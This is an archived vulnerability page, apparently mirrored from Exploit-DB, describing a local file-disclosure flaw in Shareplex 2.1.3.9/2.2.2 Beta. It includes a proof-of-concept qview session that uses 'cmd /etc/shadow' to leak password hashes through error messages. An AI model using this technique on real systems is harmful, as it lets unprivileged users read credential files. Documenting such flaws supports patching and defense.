Shareplex 2.1.3.9/2.2.2 Beta – Arbitrary Local File Disclosure

Shareplex 2.1.3.9/2.2.2 Beta – Arbitrary Local File Disclosure

漏洞ID 1053524 漏洞类型
发布时间 2001-03-30 更新时间 2001-03-30
图片[1]-Shareplex 2.1.3.9/2.2.2 Beta – Arbitrary Local File Disclosure-安全小百科CVE编号 N/A
图片[2]-Shareplex 2.1.3.9/2.2.2 Beta – Arbitrary Local File Disclosure-安全小百科CNNVD-ID N/A
漏洞平台 HP-UX CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/20724
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/2535/info

Shareplex is a database replication tool from Quest Software.

Versions of the product contain a vulnerability which can permit local unprivileged users to read arbitrary files.

The Qview component of Shareplex allows its user to specify a file containing Qview commands as input.

If the contents of the file are not valid Qview commands, they will be output to standard error as part of error messages. Exploiting this behaviour, an attacker can obtain the contents of normally unreadable, sensitive files
from this error output.

This may lead to a compromise of enhanced privileges. 

$ id
uid=500(foo) gid=200(bar)
$ cd <path to shareplex binaries>
$ ./qview
qdump> cmd /etc/shadow
Executing: root:xDmyz1K9xRKRo:11236::::::
invalid command root:xDmyz1K9xRKRo:11236::::::
...
Executing: splex:BdJCfh1D32hzo:11290::::::
invalid command splex:BdJCfh1D32hzo:11290::::::
Executing: foo:2MQXUgAcnOcEU:11344::::::
invalid command foo:2MQXUgAcnOcEU:11344::::::
qdump> quit
$

相关推荐: KICQ Remote Arbitrary Command Execution Vulnerability

KICQ Remote Arbitrary Command Execution Vulnerability 漏洞ID 1103414 漏洞类型 Input Validation Error 发布时间 2001-02-14 更新时间 2001-02-14 CVE…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享